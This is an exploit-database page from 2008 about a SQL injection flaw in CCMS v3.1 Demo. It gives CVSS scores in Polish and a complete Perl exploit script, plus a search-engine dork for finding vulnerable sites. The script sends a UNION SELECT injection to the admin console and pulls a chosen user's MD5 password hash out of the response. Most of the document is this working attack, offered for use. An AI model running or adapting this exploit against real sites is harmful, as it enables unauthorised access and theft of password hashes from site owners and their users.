CCMS v3.1 Demo <= SQL Injection Vulnerability 0day

2008.01.04
Credit: Pr0metheuS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#!/usr/bin/perl #Found by Pr0metheuS #Coded by Pr0metheuS #Gr33tz-Team #Dork : intitle:"CCMS v3.1 Demo PW" print "______________________________________\n"; print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; print "______________________________________\n"; print "[+] Enter SITE:\n"; $SITE = <STDIN>; chomp $SITE; print "[+] Enter PATH:\n"; $PATH = <STDIN>; chomp $PATH; print "[+] Enter USERID:\n"; $USERID = <STDIN>; chomp $USERID; print "______________________________________\n"; #Send Request use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("Mozilla/8.0"); $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3 ,PASSWORD+from+user+where+userid=$USERID/*"); $req->header('Accept' => 'text/html'); $res = $ua->request($req); $con = $res->content; #FIND MD5 IN TEXT REGEX !!! if ($con =~ "/([0-9a-fA-F]{32})/") { print "______________________________________\n"; print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; print "[+] Exploit successful!\n"; print "[+] USERID:$USERID\n"; print "[+] MD5:$1\n"; print "______________________________________\n"; } else{ print "______________________________________\n"; print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; print "[+] Exploit Failed!\n"; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top